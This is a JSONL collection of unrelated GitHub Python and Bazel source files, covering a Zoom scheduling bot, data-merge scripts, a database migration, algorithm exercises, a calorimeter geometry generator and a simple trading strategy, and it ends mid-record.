+{"seq_id":"7299020692","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport datetime\nfrom mail_analyzer import bardAnalyzer\nimport pyautogui as pg\nimport pyperclip\nimport pandas as pd\n\n\nclass schedule:\n    def __init__(self, driver):\n        self.driver = driver\n\n    def schedule_zoom_meeting(self, linkReqMails):\n        wait = WebDriverWait(self.driver, 300)\n        # invitation links collected for each scheduled meeting\n        invitation_link = []\n\n        # extract the required details from the mail from bard analyzer\n        bardInstance = bardAnalyzer(linkReqMails)\n        meeting_details = bardInstance.extract_meeting_details(linkReqMails)\n        # print(meeting_details)\n\n        for index in range(len(meeting_details)):\n            # start the process of scheduling the meeting\n            scheduler_path = \"//ul[@aria-label='meetings']//a[@id='btnScheduleMeeting']\"\n            scheduler = wait.until(\n                EC.visibility_of_element_located((By.XPATH, scheduler_path))\n            )\n            scheduler.click()\n\n            # define the topic of the meeting\n            topic_path = \"//input[@id='topic']\"\n            topic = wait.until(\n                
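# waits (up to the 300 s WebDriverWait timeout above) for the topic field to become visible\n                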
EC.visibility_of_element_located((By.XPATH, topic_path))\n )\n topic.send_keys(meeting_details['Topic'].iloc[index])\n\n # set the date of the meeting\n date = meeting_details['Date'].iloc[index]\n date = datetime.datetime.strptime(str(date), '%Y-%m-%d')\n\n # extract day month and year\n ex_day = date.day\n ex_month = date.strftime('%B')\n ex_year = date.year\n ex_weekday = date.strftime(\"%A\")\n web_date_format = ex_month + \" \" + str(ex_day) + \" \" + str(ex_year) + \" \" + ex_weekday\n print(web_date_format)\n # set the calendar\n calender = self.driver.find_element(\n By.XPATH, \"//input[@id='mt_time']\")\n self.driver.execute_script(\"arguments[0].scrollIntoView();\", topic)\n calender.click()\n # select the month\n month_sel = wait.until(\n EC.visibility_of_element_located(\n (By.CSS_SELECTOR, \"div[role='application' i] span:nth-child(1)\"))\n )\n cmonth = month_sel.text\n year_sel = wait.until(\n EC.visibility_of_element_located(\n (By.CSS_SELECTOR, \"div[role='application' i] span:nth-child(2)\"))\n )\n cyear = year_sel.text\n # iterate till the year and month are equal\n while True:\n if cmonth == str(ex_month) and cyear == str(ex_year):\n break\n else:\n next = wait.until(\n EC.visibility_of_element_located((By.XPATH, \"//button[contains(@class, 'zm-date-picker__next-month-btn') and contains(@aria-label, 'Next Month')]\"))\n )\n action = ActionChains(self.driver)\n action.move_to_element(next).click().perform()\n cmonth = wait.until(\n EC.visibility_of_element_located((By.CSS_SELECTOR, \"div[role='application' i] span:nth-child(1)\"))\n ).text\n cyear = wait.until(\n EC.visibility_of_element_located((By.CSS_SELECTOR, \"div[role='application' i] span:nth-child(2)\"))\n ).text\n # select the date\n table = self.driver.find_element(By.CLASS_NAME, \"zm-date-table\")\n rows = table.find_elements(By.CLASS_NAME, \"zm-date-table__row\")\n for row in rows:\n cells = row.find_elements(By.TAG_NAME, \"td\")\n for cell in cells:\n date_element = cell.find_element(By.TAG_NAME, \"a\")\n date_text = date_element.text\n aria_label = date_element.get_attribute(\"aria-label\")\n if date_text == str(ex_day) and web_date_format in aria_label:\n date_element.click()\n break\n\n # define the start time of the meeting\n start_time_path = \"//div[@class='zm-select mgl-sm start-time zm-select--small']//div[@class='zm-select-input']\"\n start_time = self.driver.find_element(By.XPATH, start_time_path)\n # get the time from the dataframe\n time_string = meeting_details['Time'].iloc[index]\n time_parts = time_string.split()\n if len(time_parts) == 2:\n time = time_parts[0]\n period = time_parts[1]\n # send the time to the start time\n start_time.click()\n pg.typewrite(time)\n pg.press('enter')\n # set the period of the meeting\n period_dropdown_path = \"(//span[@id='start_time2'])[1]\"\n self.driver.find_element(By.XPATH, period_dropdown_path).click()\n if period == 'AM':\n # self.driver.find_element(\n # By.XPATH, \"(//dd[@id='select-item-start_time2-0'])[1]\").click()\n pg.press('enter')\n else:\n # select PM\n # self.driver.find_element(\n # By.XPATH, \"(//dd[@id='select-item-start_time2-1'])[1]\").click()\n pg.press('down')\n pg.press('enter')\n\n # set the time zone\n timezone_india = \"(GMT+5:30) India\"\n timezone_path = '//input[@placeholder=\"select\" and @aria-label=\"select time zone,(GMT-7:00) Pacific Time (US and Canada)\" and @class=\"zm-select-input__inner\"]'\n timezone = self.driver.find_element(By.XPATH, timezone_path)\n timezone.click()\n timezone.send_keys(timezone_india)\n 
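# pyautogui sends a real Enter keypress to commit the highlighted timezone option\n            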
pg.press('enter')\n\n # set the attendees\n attendees_path = \"//input[@placeholder='Enter user names or email addresses']\"\n attendees = self.driver.find_element(By.XPATH, attendees_path)\n attendees_name = meeting_details['Attendees'].iloc[index]\n attendees.click()\n attendees.send_keys(attendees_name)\n pg.sleep(5)\n pg.press('enter')\n\n # save the meeting\n save_path = \"//div[@class='zm-sticky-fixed schedule-bar-sticky']//button[1]\"\n WebDriverWait(self.driver, 10).until(\n EC.visibility_of_element_located((By.XPATH, save_path))\n ).click()\n\n # copy the meeting link as invitation\n wait.until(\n EC.visibility_of_element_located(\n (By.XPATH, \"//button[contains(@class, 'zm-button--plain') and contains(@class, 'zm-button--small') and contains(@class, 'zm-button') and span[contains(@class, 'zm-button__slot') and contains(., 'Copy Invitation')]]\"))\n ).click()\n\n # copy to clipboard\n wait.until(\n EC.visibility_of_element_located(\n (By.XPATH, \"//button[contains(@class, 'zm-button--primary') and contains(@class, 'zm-button--small') and contains(@class, 'zm-button') and span[contains(@class, 'zm-button__slot') and contains(., 'Copy Meeting Invitation')]]\"))\n ).click()\n invitation = pyperclip.paste()\n invitation_link.append(invitation)\n self.driver.find_element(By.XPATH, \"//div[@aria-labelledby='customTitle']//span[@class='zm-button__slot'][normalize-space()='Cancel']\").click()\n\n # add the invitation link to the dataframe\n meeting_details['Invitation Link'] = pd.Series(invitation_link).tolist()\n\n return meeting_details\n","repo_name":"uddiGitHub/Automatic-Zoom-Meeting-Scheduler-with-Email-Integration","sub_path":"src/meeting_Scheduler.py","file_name":"meeting_Scheduler.py","file_ext":"py","file_size_in_byte":7792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"72582698753","text":"#import itertools\nimport csv\nimport json\n\nnew_data = []\n\nwith open('users.json', 'r') as f:\n users = json.load(f)\n\n for user in users:\n new_user = {'name': user['name'], 'gender': user['gender'],\\\n 'address': user['address'], 'books':[]}\n new_data.append(new_user)\n\nwith open('books.csv') as f:\n books = csv.reader(f)\n header = next(books)\n\n for user, book in zip(new_data, books):\n the_book = {'title': book[header.index('Title')],\\\n 'author': book[header.index('Author')],\\\n 'height': book[header.index('Height')]}\n user['books'].append(the_book)\n\nwith open('new_data.json', 'w') as f:\n json.dump(new_data, f, indent=4)\n\n\n","repo_name":"robert-otus/test_data","sub_path":"books.py","file_name":"books.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74916866435","text":"\"\"\"Initial structure\n\nRevision ID: c7b49d6f2948\nRevises: \nCreate Date: 2018-06-04 14:56:09.879629\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c7b49d6f2948'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table('guild_prefs',\n sa.Column('guild_id', sa.String, primary_key=True),\n sa.Column('prefix', sa.String),\n sa.Column('mute_role', sa.String),\n sa.Column('admin_roles', postgresql.ARRAY(sa.String)),\n sa.Column('mod_roles', postgresql.ARRAY(sa.String)))\n\n op.create_table('delayed_mutes',\n sa.Column('guild_id', sa.String, primary_key=True),\n 
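# guild_id and member_id together form a composite primary key: one delayed mute per member per guild\n                    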
sa.Column('member_id', sa.String, primary_key=True),\n                    sa.Column('end_time', sa.DateTime))\n\n    op.create_table('warnings',\n                    sa.Column('id', sa.Integer, primary_key=True, autoincrement=True),\n                    sa.Column('guild_id', sa.String),\n                    sa.Column('member_id', sa.String),\n                    sa.Column('moderator_id', sa.String),\n                    sa.Column('reason', sa.String, nullable=True),\n                    sa.Column('timestamp', sa.DateTime),\n                    sa.Column('cleared_on', sa.DateTime, nullable=True),\n                    sa.Column('cleared_by', sa.String, nullable=True))\n\n    op.create_index('warnings_guild_idx', 'warnings', ['guild_id'])\n    op.create_index('warnings_guild_member_idx', 'warnings', ['guild_id', 'member_id'])\n\n\ndef downgrade():\n    op.drop_index('warnings_guild_member_idx', 'warnings')\n    op.drop_index('warnings_guild_idx', 'warnings')\n    op.drop_table('warnings')\n    op.drop_table('delayed_mutes')\n    op.drop_table('guild_prefs')\n","repo_name":"bryanforbes/Bothanasius","sub_path":"alembic/versions/c7b49d6f2948_initial_structure.py","file_name":"c7b49d6f2948_initial_structure.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"31963401977","text":"from time import time\n\nfrom LinkedList.linkedlist import LinkedList\nfrom Set_Map.set_map import Set\n\nclass LinkedListSet(Set):\n\n    def __init__(self):\n        self._list = LinkedList()\n\n    def getSize(self):\n        return self._list.get_size()\n\n    def isEmpty(self):\n        # empty iff the underlying linked list holds no nodes\n        return self._list.get_size() == 0\n\n    def contains(self, e):\n        return self._list.contains(e)\n\n    def add(self, e):\n        if self.contains(e):\n            return\n        self._list.add_first(e)\n\n    def remove(self, e):\n        self._list.remove(e)\n\n\nif __name__ == '__main__':\n    words = \"\"\n    with open(\"./ZenofPython\",\"r\") as f:\n        words = f.read()\n    ##QAQ: how to split on whitespace and '.' at the same time?\n    words = words.split()\n\n    start_time = time()\n    word_set = LinkedListSet()\n    for word in words:\n        word_set.add(word)\n\n    print('Total words: ', len(words))\n    print('Unique words: ', word_set.getSize())\n    print('Contains word \"better\": ', word_set.contains('better'))\n    print(f'Total time: {time() - start_time} seconds')\n","repo_name":"mrmenand/Py_transaction","sub_path":"Algorithms/Python/Set_Map/linkedlist_set.py","file_name":"linkedlist_set.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"26625672635","text":"from gtts import gTTS\nfrom googletrans import Translator\nfp = open('e:\\\\0\\\\english_words.txt', mode='r', buffering=-1, encoding=\"utf-8\", errors=None, newline=None, closefd=True, opener=None)\nwords = fp.readlines()\nlanguage = 'en'\nnpp = 0\nfor word in words:\n    npp+=1\n    if npp<795:  # presumably resumes after an earlier partial run\n        continue\n    word = word.replace('\\n','')\n    myobj = gTTS(text=word, lang=language, slow=False)\n    myobj.save(f'e:\\\\0\\\\english_words_mp3\\\\{npp}_{word}.mp3')\n    translator = Translator()\n    result = translator.translate(word, src=language, dest='ru')\n    word_rus = result.text\n    myobj = gTTS(text=word_rus, lang='ru', slow=False)\n    myobj.save(f'e:\\\\0\\\\english_words_mp3\\\\{npp}_{word}_rus.mp3')\n    print(npp)\n\n\n\n","repo_name":"yls1980/Python_projects","sub_path":"python_base/venv_test/english_words_to_mp3.py","file_name":"english_words_to_mp3.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70204064195","text":"class Solution(object):\n    def lengthOfLongestSubstring(self, s):\n        \"\"\"\n        :type s: str\n        :rtype: int\n        \"\"\"\n        
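# sliding window: grow the right edge r, and shrink from the left l until s[r] is unique in the window\n        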
sub = set()\n l = 0\n res = 0\n for r in range (len(s)):\n while s[r] in sub:\n sub.remove(s[l])\n l += 1\n sub.add(s[r])\n res = max(res, r - l + 1)\n return res","repo_name":"YuqinHu/leetcode","sub_path":"python/5_sliding_window/3_Longest_Substring_Without_Repeating_Characters.py","file_name":"3_Longest_Substring_Without_Repeating_Characters.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4497595577","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport matplotlib.colors as mcolors\nfrom matplotlib import cm, rc\nimport pandas as pd\nfrom copy import copy, deepcopy\nfrom tqdm import tqdm\n\nfont = {'family' : 'DejaVu Sans',\n# 'weight' : 'bold',\n 'size' : 8 }\n\nrc('font', **font)\nrc('axes', linewidth=0.5)\nrc('lines', lw=0.5)\nrc('axes', axisbelow=False)\nplt.rcParams['xtick.major.size'] = 1.0\nplt.rcParams['xtick.major.width'] = 0.5\nplt.rcParams['xtick.minor.size'] = 1.0\nplt.rcParams['xtick.minor.width'] = 0.5\nplt.rcParams['ytick.major.size'] = 1.0\nplt.rcParams['ytick.major.width'] = 0.5\nplt.rcParams['ytick.minor.size'] = 1.0\nplt.rcParams['ytick.minor.width'] = 0.5\n\nclass Cell:\n\n def __init__(self):\n self.granularity = [256,256,128,-1,64,64,32]\n self.vertices = [[],[],[],[],[],[],[],[]]\n self.vertices_dict = {}\n self.region = 0 #Barrel (2) or endcap (-1,1)\n self.layer = -1\n self.eta_idx = 0\n self.phi_idx = 0\n self.dphi = 0\n\n def RotatePhi(self):\n\n self.dphi = 2*np.pi/self.granularity[self.layer]\n rotated_cell = deepcopy(self)\n rotated_cell.phi_idx = self.phi_idx + 1 #increment phi division\n\n rotated_cell.vertices[0] = rotated_cell.vertices[4][:]\n rotated_cell.vertices[1] = rotated_cell.vertices[5][:]\n rotated_cell.vertices[2] = rotated_cell.vertices[6][:]\n rotated_cell.vertices[3] = rotated_cell.vertices[7][:]\n\n for i,v in enumerate(self.vertices):\n if i<4: \n continue #only shift last 4\n x = v[0]\n y = v[1]\n xp = x*np.cos(self.dphi) - y*np.sin(self.dphi)\n yp = x*np.sin(self.dphi) + y*np.cos(self.dphi)\n rotated_cell.vertices[i][0] = xp\n rotated_cell.vertices[i][1] = yp\n\n rotated_cell = Update(rotated_cell)\n\n return rotated_cell\n\n def MirrorZ(self):\n\n mirrored_cell = deepcopy(self)\n\n mirrored_cell.region = int(-1*mirrored_cell.region)\n\n for i,v in enumerate(self.vertices):\n mirrored_cell.vertices[i] = [self.vertices[i][0], self.vertices[i][1], -1*self.vertices[i][2]]\n\n mirrored_cell = Update(mirrored_cell)\n\n return mirrored_cell\n\n\ndef Update(cell):\n\n cell.vertices_dict = {}\n for i,v in enumerate(cell.vertices):\n cell.vertices_dict['v{}x'.format(i)] = [v[0]]\n cell.vertices_dict['v{}y'.format(i)] = [v[1]]\n cell.vertices_dict['v{}z'.format(i)] = [v[2]]\n cell.vertices_dict['layer'] = cell.layer\n cell.vertices_dict['region'] = cell.region\n cell.vertices_dict['eta_idx'] = cell.eta_idx\n cell.vertices_dict['phi_idx'] = cell.phi_idx\n cell.vertices_dict['hash'] = int(np.sign(cell.region)*int( f'{abs(cell.region)}{cell.layer}{cell.eta_idx}{cell.phi_idx:03}' ))\n\n return cell\n\ndef EtaToTheta( eta ):\n return 2.0 * np.arctan( np.exp( -eta ) )\n\n#--------------------------------------------------\n\n#\n# Assuming that the barrel covers half of the detector eta range\n#\n\nnBins = 128\netaMax = 3.0\netaMaxBarrel = etaMax / 2.0\ndEta = etaMax / nBins\n\nlinewidth = 0.5\n\nlayer_names = [ 'ECAL1', 'ECAL2', 'ECAL3', 'gap', 'HCAL1', 'HCAL2', 'HCAL3' ]\n\nr_all = [ 1500, 1594.11, 1970.56, 2017.62, 2097.62, 
2496.17, 3585.57, 4063.84 ] # Fe gap missing\n\nlayer_mergeFactors = [ 1, 1, 2, 1, 4, 4, 8 ]\n\nnLayers = len( r_all ) - 1\n\ntableau_colors = list( mcolors.TABLEAU_COLORS )\ncolors = tableau_colors[:3]\ncolors.append( \"white\" )\ncolors += tableau_colors[3:]\n\n\nnBins_barrel = nBins // 2\nnBins_endcap = nBins_barrel\n\nx_min_border = np.zeros( nBins_barrel )\nx_max_border = np.zeros( nBins_barrel )\ny_low_max_border = np.zeros( nBins_barrel )\ny_high_max_border = np.zeros( nBins_barrel )\n\ncell_idx = 0\ncell_df = pd.DataFrame()\n\n#\n# Endcap\n#\n\nfor iLayer in tqdm(range(nLayers)):\n\n eta_idx = 0\n if iLayer == 3: # Fe gap\n continue\n \n for iCell in tqdm(range(nBins_endcap)):\n \n if iCell % layer_mergeFactors[iLayer] == 0 and iCell>0:\n eta_idx = eta_idx + 1\n\n color = colors[iLayer]\n d = r_all[iLayer + 1] - r_all[iLayer]\n lz = r_all[0] / np.tan( EtaToTheta( etaMaxBarrel ) )\n \n theta_min = EtaToTheta( etaMax - iCell * dEta )\n theta_max = EtaToTheta( etaMax - ( iCell + 1 ) * dEta )\n \n lz += ( r_all[iLayer] - r_all[0] ) * np.cos( theta_min )\n \n y_low_min = lz * np.tan( theta_min )\n y_low_max = lz * np.tan( theta_max )\n \n dz = d * np.cos( theta_min )\n y_high_min = ( lz + dz ) * np.tan( theta_min )\n y_high_max = ( lz + dz ) * np.tan( theta_max )\n\n x_min_border[iCell] = lz\n x_max_border[iCell] = lz + dz\n y_low_max_border[iCell] = y_low_max\n y_high_max_border[iCell] = y_high_max\n\n #Fill cell vertices dataframe\n cell = Cell()\n cell.layer = iLayer\n cell.region = 1\n cell.eta_idx = eta_idx\n cell.phi_idx = 0\n cell.vertices[0] = [0,y_low_min,lz]\n cell.vertices[1] = [0,y_low_max,lz]\n cell.vertices[2] = [0,y_high_min,lz+dz]\n cell.vertices[3] = [0,y_high_max,lz+dz]\n cell.vertices[4] = cell.vertices[0]\n cell.vertices[5] = cell.vertices[1]\n cell.vertices[6] = cell.vertices[2]\n cell.vertices[7] = cell.vertices[3]\n cell.dphi = -1\n cell = Update(cell)\n\n for slice in range(cell.granularity[cell.layer]):\n #if slice > 0: continue HACK!\n rotated_cell = cell.RotatePhi()\n rotated_cell_df_i = pd.DataFrame(rotated_cell.vertices_dict)\n if(len(cell_df)==0):\n cell_df = rotated_cell_df_i\n else:\n cell_df = pd.concat([cell_df,rotated_cell_df_i])\n cell_df = pd.concat([cell_df,pd.DataFrame(rotated_cell.MirrorZ().vertices_dict)])\n cell = rotated_cell\n\n if iCell == 0:\n plt.plot( [lz, lz], [y_low_min, y_low_max] , c = color, lw = linewidth, label = layer_names[iLayer] )\n else:\n plt.plot( [lz, lz], [y_low_min, y_low_max] , c = color, lw = linewidth )\n plt.plot( [lz + dz, lz + dz], [y_high_min, y_high_max], c = color, lw = linewidth )\n\n if iCell > 1:\n plt.plot( [lz, x_min_border[iCell - 1]], [y_low_min, y_low_max_border[iCell - 1]], c = color, lw = linewidth )\n plt.plot( [lz + dz, x_max_border[iCell - 1]], [y_high_min, y_high_max_border[iCell - 1]], c = color, lw = linewidth )\n \n if iCell == nBins_endcap - 1:\n plt.plot( [lz + dz, lz], [y_high_max, y_low_max], c = color, lw = linewidth )\n if iCell % layer_mergeFactors[iLayer] == 0:\n plt.plot( [lz, lz + dz], [y_low_min, y_high_min], c = color, lw = linewidth )\n \n#\n# Barrel\n#\n\nx_low_max_border = np.zeros( nBins_barrel )\nx_high_min_border = np.zeros( nBins_barrel )\nx_high_max_border = np.zeros( nBins_barrel )\ny_high_border = np.zeros( nBins_barrel )\ny_low_border = np.zeros( nBins_barrel )\n\nfor iLayer in tqdm(range(nLayers)):\n \n eta_idx = 0\n\n for iCell in tqdm(range(nBins_barrel)):\n\n if iCell % layer_mergeFactors[iLayer] == 0 and iCell>0:\n eta_idx = eta_idx + 1\n\n color = colors[iLayer]\n r = 
r_all[iLayer]\n d = r_all[iLayer + 1] - r_all[iLayer]\n \n eta_min = iCell * dEta\n eta_max = eta_min + dEta\n theta_min = EtaToTheta( eta_min )\n theta_max = EtaToTheta( eta_max )\n\n if iLayer == 0:\n \n x_min_low = r / np.tan( theta_min )\n x_max_low = r / np.tan( theta_max )\n y_low = r\n\n else:\n\n if iCell == 0:\n x_min_low = 0.0\n else:\n x_min_low = x_high_min_border[ iCell ]\n x_max_low = x_high_max_border[ iCell ]\n \n y_low = y_high_border[ iCell ] \n \n dy = d * np.sin( theta_min )\n dx_min = d * np.cos( theta_min )\n dx_max = dy / np.tan( theta_max )\n\n# if iLayer == 0:\n# print( x_max_low + dx_max )\n# else:\n# print( x_max_low )\n#\n# print()\n\n x_low_max_border[iCell] = x_max_low\n x_high_min_border[iCell] = x_min_low + dx_min\n x_high_max_border[iCell] = x_max_low + dx_max\n y_low_border[iCell] = y_low\n y_high_border[iCell] = y_low + dy\n \n if iLayer == 3: # Fe gap\n continue\n\n #Fill cell vertices dataframe\n cell = Cell()\n cell.layer = iLayer\n cell.region = 2\n cell.eta_idx = eta_idx\n cell.phi_idx =0 \n cell.vertices[0] = [0,y_low,x_min_low]\n cell.vertices[1] = [0,y_low,x_max_low]\n #cell.vertices[2] = [0,y_high_border[iCell - 1],x_high_max_border[iCell - 1]]\n cell.vertices[2] = [0,y_high_border[iCell],x_high_min_border[iCell]]\n cell.vertices[3] = [0,y_high_border[iCell],x_high_max_border[iCell]]\n cell.vertices[4] = cell.vertices[0]\n cell.vertices[5] = cell.vertices[1]\n cell.vertices[6] = cell.vertices[2]\n cell.vertices[7] = cell.vertices[3]\n cell.dphi = -1\n cell = Update(cell)\n\n for slice in range(cell.granularity[cell.layer]):\n #if slice > 0: continue HACK!\n rotated_cell = cell.RotatePhi()\n rotated_cell_df_i = pd.DataFrame(rotated_cell.vertices_dict)\n if(len(cell_df)==0):\n cell_df = rotated_cell_df_i\n else:\n cell_df = pd.concat([cell_df,rotated_cell_df_i])\n cell_df = pd.concat([cell_df,pd.DataFrame(rotated_cell.MirrorZ().vertices_dict)])\n cell = rotated_cell\n\n\n\n plt.plot( [ x_min_low, x_max_low ], [ y_low, y_low ], c = color, lw = linewidth )\n if ( iCell % layer_mergeFactors[iLayer] == 0 ) and iCell > 0:\n plt.plot( [ x_min_low, x_high_max_border[ iCell - 1 ] ], [ y_low, y_high_border[iCell - 1] ], c = color, lw = linewidth )\n elif iCell > 0:\n# plt.plot( [ x_min_low, x_min_low + dx_min ], [ y_low, y_low + dy ], c = \"k\", lw = linewidth )\n plt.plot( [ x_high_max_border[iCell - 1], x_high_min_border[iCell] ], [ y_high_border[iCell - 1], y_high_border[iCell] ], c = color, lw = linewidth )\n plt.plot( [ x_min_low, x_low_max_border[iCell - 1] ], [ y_low, y_low_border[iCell - 1] ], c = color, lw = linewidth )\n if iCell == nBins_barrel - 1:\n plt.plot( [x_max_low, x_max_low + dx_max], [y_low, y_low + dy], c = color, lw = linewidth )\n \n# plt.plot( [ x_max_low, x_max_low + dx_max ], [ y_low, y_low + dy ], c = color, lw = linewidth )\n plt.plot( [ x_min_low + dx_min, x_max_low + dx_max ], [ y_low + dy, y_low + dy ], c = color, lw = linewidth )\n\n#\n# ID\n#\n\n### dump cell vertices on plot\nfor v in [2,3]:\n plot_df = cell_df[ (cell_df['phi_idx']==1) & (cell_df['region']>0) ]\n plt.scatter(plot_df[f'v{v}z'],plot_df[f'v{v}y'])\n\n### Write cells dataframe\ncell_df['idx'] = range(len(cell_df))\nprint(cell_df)\ncell_df.to_pickle(\"cells.pkl\")\n\n\nd_x = 0.01\n\nax = plt.gca()\n\nr_pixel = [ 39, 75, 155, 213, 271 ]\ndz_pixel = 280\n\nr_strips = [ 405, 562, 762, 1000 ]\ndz_strips = 1150\n\nz_pixel_ec = [ 350, 420, 530, 670, 870, 1100, 1400, 2000, 2300, 2650 ]\nz_strips_ec = [ 1300, 1600, 1900, 2250, 2650 ]\n\nplt.grid(True)\n\nfor i_r, r in 
enumerate( r_pixel ):\n label = None\n if i_r == 0:\n label = \"Tracker\"\n plt.plot( [0.0, dz_pixel], [r, r], color = colors[9], label = label, lw = linewidth )\n\nfor i_r, r in enumerate( r_strips ):\n plt.plot( [0.0, dz_strips], [r, r], color = colors[9], lw = linewidth )\n\nfor z in z_pixel_ec[:7]:\n plt.plot( [ z, z ], [ 39, 271 ], color = colors[9], lw = linewidth )\n \nfor z in z_pixel_ec[7:]:\n plt.plot( [ z, z ], [ 155, 271], color = colors[9], lw = linewidth )\n\nfor z in z_strips_ec:\n plt.plot( [z, z], [405, 1000], color = colors[9], lw = linewidth )\n\nr_iron = [ 1166.4433333333333, 1332.8866666666666 ]\ndz_iron = [ 2527.27, 2839.51 ]\n\nlabel = \"Iron\"\nfor r, dz in zip( r_iron, dz_iron ):\n plt.plot( [ 0.0, dz ], [ r, r ], color = colors[8], lw = linewidth, label = label )\n label = None\n\nplt.plot( [ 2839.51, 2839.51 ], [ 292.797, 1332.8866666666666 ], color = colors[8], lw = linewidth, label = label )\n \nplt.xlim( 0.0, 6e3 )\nplt.ylim( 0.0, 6e3 )\n\nplt.xlabel('z [mm]')\nplt.ylabel('y [mm]')\nplt.gca().set_axisbelow(True)\nplt.legend()\nplt.gca().legend( fancybox = 'round', frameon = True, loc = \"upper right\", fontsize = 5.5 )\nplt.tight_layout()\n\nplt.show()\n\n\n","repo_name":"cocoa-hep/cocoa-hep","sub_path":"COCOA/phoenix/event/dump_cell_vertex_lookup.py","file_name":"dump_cell_vertex_lookup.py","file_ext":"py","file_size_in_byte":12666,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"6056714065","text":"JAVA_DOCS = \"-link https://docs.oracle.com/en/java/javase/11/docs/api/\"\n\ndef _impl(ctx):\n dir = ctx.label.name\n outjar = ctx.outputs.jar\n\n dep_list = []\n for dep in ctx.files.deps:\n dep_list += [dep.path]\n\n src_list = []\n for src in ctx.files.srcs:\n src_list += [src.path]\n\n java_runtime = ctx.attr._jdk[java_common.JavaRuntimeInfo]\n jar_exe_path = \"%s/bin/jar\" % java_runtime.java_home\n\n cmd = [\n \"mkdir %s\" % dir,\n \"javadoc -encoding UTF-8 -quiet -tag onos.rsModel:a:\\\"onos model\\\" %s -d %s -cp %s %s\" %\n (JAVA_DOCS, dir, \":\".join(dep_list), \" \".join(src_list)),\n \"%s cf %s -C %s .\" % (jar_exe_path, outjar.path, dir),\n ]\n\n ctx.actions.run_shell(\n inputs = ctx.files.srcs + ctx.files.deps,\n outputs = [outjar],\n progress_message = \"Generating javadocs jar for %s\" % ctx.attr.name,\n command = \";\\n\".join(cmd),\n tools = java_runtime.files,\n )\n\njavadoc = rule(\n attrs = {\n \"deps\": attr.label_list(allow_files = True),\n \"srcs\": attr.label_list(allow_files = True),\n \"_jdk\": attr.label(\n default = Label(\"@bazel_tools//tools/jdk:current_java_runtime\"),\n providers = [java_common.JavaRuntimeInfo],\n ),\n },\n implementation = _impl,\n outputs = {\"jar\": \"%{name}.jar\"},\n)\n","repo_name":"opennetworkinglab/onos","sub_path":"tools/build/bazel/javadoc.bzl","file_name":"javadoc.bzl","file_ext":"bzl","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":1121,"dataset":"github-code","pt":"61"} +{"seq_id":"24157062324","text":"from .base import StrategyParameter, BaseStrategy\n\n\nf_delta = lambda x, y: (x / y - 1) * 100\n\n\nclass Strategy(BaseStrategy):\n\n VERBOSE_NAME = \"Персечение двух SMA\"\n WINDOW_LENGTH = 30\n TIMEFRAME = \"1m\"\n MA1 = StrategyParameter(\"Период MA1\", \"int\", 10)\n MA2 = StrategyParameter(\"Период MA2\", \"int\", 27)\n BALANCE = StrategyParameter(\"Баланс для торговли\", \"int\", 5)\n\n def __init__(self, strat_params):\n self.state = None\n self.strat_params = strat_params\n self.INDICATORS = {\n 
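# indicator specs as tuples (type, period); a trailing 1 presumably reads the value one candle back\n            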
\"sma1\": (\"sma\", self.strat_params[\"MA1\"]),\n \"sma1_prev\": (\"sma\", self.strat_params[\"MA1\"], 1),\n \"sma2\": (\"sma\", self.strat_params[\"MA2\"]),\n \"sma2_prev\": (\"sma\", self.strat_params[\"MA2\"], 1)\n }\n\n def handle_data_candle(self, api, data, indi):\n last_candle = data[\"candles\"][-1]\n delta = (f_delta(indi.get(\"sma1_prev\"), indi.get(\"sma2_prev\")), f_delta(indi.get(\"sma1\"), indi.get(\"sma2\")))\n buy_cond = [\n last_candle[4] < indi.get(\"sma1\"),\n delta[-1] > delta[-2],\n delta[-1] < -0.1,\n last_candle[3] < indi.get(\"sma1\") < last_candle[2],\n ]\n sell_cond = [\n last_candle[4] > indi.get(\"sma1\"),\n delta[-1] < delta[-2],\n delta[-1] > -0.1,\n last_candle[3] < indi.get(\"sma1\") < last_candle[2],\n ]\n print(f\"{self.state} buy : {buy_cond} sell: {sell_cond}\")\n if self.state is None:\n if all(buy_cond) or True:\n api.create_market_order(data[\"symbol\"], \"buy\", self.strat_params[\"BALANCE\"])\n self.state = \"long\"\n elif all(sell_cond):\n api.create_market_order(data[\"symbol\"], \"sell\", self.strat_params[\"BALANCE\"])\n self.state = \"short\"\n elif self.state == \"long\":\n if all(sell_cond) or (delta[-1] - delta[-2] > 0.18 and delta[-1] > 0):\n api.create_market_order(data[\"symbol\"], \"sell\", 2*self.strat_params[\"BALANCE\"])\n self.state = \"short\"\n elif self.state == \"short\":\n if all(sell_cond) or (delta[-1] - delta[-2] < -0.18 and delta[-1] < 0):\n api.create_market_order(data[\"symbol\"], \"buy\", 2*self.strat_params[\"BALANCE\"])\n self.state = \"long\"\n\n\n def handle_data_tick(self, api, data, indicators):\n pass#print(\"tick\")\n","repo_name":"shebetov/diaper","sub_path":"strategies/strat1.py","file_name":"strat1.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4029226102","text":"from tda_lista_lista import Lista, insertar, eliminar, busqueda, barrido, barrido_con_sublista, tamanio, lista_vacia\r\nfrom random import randint\r\n\r\ndef eliminar_anteultimo(lista,clave):\r\n cont = 